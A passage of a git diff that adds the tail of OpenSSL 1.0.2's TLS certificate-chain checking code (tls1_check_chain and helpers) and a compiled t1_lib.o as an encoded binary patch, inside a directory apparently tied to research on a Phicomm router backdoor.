+            X509 *ca = sk_X509_value(chain, i);
+            if (!tls1_check_cert_param(s, ca, 0)) {
+                if (check_flags) {
+                    rv &= ~CERT_PKEY_CA_PARAM;
+                    break;
+                } else
+                    goto end;
+            }
+        }
+    }
+    if (!s->server && strict_mode) {
+        STACK_OF(X509_NAME) *ca_dn;
+        int check_type = 0;
+        switch (pk->type) {
+        case EVP_PKEY_RSA:
+            check_type = TLS_CT_RSA_SIGN;
+            break;
+        case EVP_PKEY_DSA:
+            check_type = TLS_CT_DSS_SIGN;
+            break;
+        case EVP_PKEY_EC:
+            check_type = TLS_CT_ECDSA_SIGN;
+            break;
+        case EVP_PKEY_DH:
+        case EVP_PKEY_DHX:
+            {
+                int cert_type = X509_certificate_type(x, pk);
+                if (cert_type & EVP_PKS_RSA)
+                    check_type = TLS_CT_RSA_FIXED_DH;
+                if (cert_type & EVP_PKS_DSA)
+                    check_type = TLS_CT_DSS_FIXED_DH;
+            }
+        }
+        if (check_type) {
+            const unsigned char *ctypes;
+            int ctypelen;
+            if (c->ctypes) {
+                ctypes = c->ctypes;
+                ctypelen = (int)c->ctype_num;
+            } else {
+                ctypes = (unsigned char *)s->s3->tmp.ctype;
+                ctypelen = s->s3->tmp.ctype_num;
+            }
+            for (i = 0; i < ctypelen; i++) {
+                if (ctypes[i] == check_type) {
+                    rv |= CERT_PKEY_CERT_TYPE;
+                    break;
+                }
+            }
+            if (!(rv & CERT_PKEY_CERT_TYPE) && !check_flags)
+                goto end;
+        } else
+            rv |= CERT_PKEY_CERT_TYPE;
+
+        ca_dn = s->s3->tmp.ca_names;
+
+        if (!sk_X509_NAME_num(ca_dn))
+            rv |= CERT_PKEY_ISSUER_NAME;
+
+        if (!(rv & CERT_PKEY_ISSUER_NAME)) {
+            if (ssl_check_ca_name(ca_dn, x))
+                rv |= CERT_PKEY_ISSUER_NAME;
+        }
+        if (!(rv & CERT_PKEY_ISSUER_NAME)) {
+            for (i = 0; i < sk_X509_num(chain); i++) {
+                X509 *xtmp = sk_X509_value(chain, i);
+                if (ssl_check_ca_name(ca_dn, xtmp)) {
+                    rv |= CERT_PKEY_ISSUER_NAME;
+                    break;
+                }
+            }
+        }
+        if (!check_flags && !(rv & CERT_PKEY_ISSUER_NAME))
+            goto end;
+    } else
+        rv |= CERT_PKEY_ISSUER_NAME | CERT_PKEY_CERT_TYPE;
+
+    if (!check_flags || (rv & check_flags) == check_flags)
+        rv |= CERT_PKEY_VALID;
+
+ end:
+
+    if (TLS1_get_version(s) >= TLS1_2_VERSION) {
+        if (cpk->valid_flags & CERT_PKEY_EXPLICIT_SIGN)
+            rv |= CERT_PKEY_EXPLICIT_SIGN | CERT_PKEY_SIGN;
+        else if (cpk->digest)
+            rv |= CERT_PKEY_SIGN;
+    } else
+        rv |= CERT_PKEY_SIGN | CERT_PKEY_EXPLICIT_SIGN;
+
+    /*
+     * When checking a CERT_PKEY structure all flags are irrelevant if the
+     * chain is invalid.
+     */
+    if (!check_flags) {
+        if (rv & CERT_PKEY_VALID)
+            cpk->valid_flags = rv;
+        else {
+            /* Preserve explicit sign flag, clear rest */
+            cpk->valid_flags &= CERT_PKEY_EXPLICIT_SIGN;
+            return 0;
+        }
+    }
+    return rv;
+}
+
+/* Set validity of certificates in an SSL structure */
+void tls1_set_cert_validity(SSL *s)
+{
+    tls1_check_chain(s, NULL, NULL, NULL, SSL_PKEY_RSA_ENC);
+    tls1_check_chain(s, NULL, NULL, NULL, SSL_PKEY_RSA_SIGN);
+    tls1_check_chain(s, NULL, NULL, NULL, SSL_PKEY_DSA_SIGN);
+    tls1_check_chain(s, NULL, NULL, NULL, SSL_PKEY_DH_RSA);
+    tls1_check_chain(s, NULL, NULL, NULL, SSL_PKEY_DH_DSA);
+    tls1_check_chain(s, NULL, NULL, NULL, SSL_PKEY_ECC);
+}
+
+/* User level utiity function to check a chain is suitable */
+int SSL_check_chain(SSL *s, X509 *x, EVP_PKEY *pk, STACK_OF(X509) *chain)
+{
+    return tls1_check_chain(s, x, pk, chain, -1);
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/t1_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..07795e63add18e3473d1e030ade55f3301f614eb
GIT binary patch
literal 31496
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
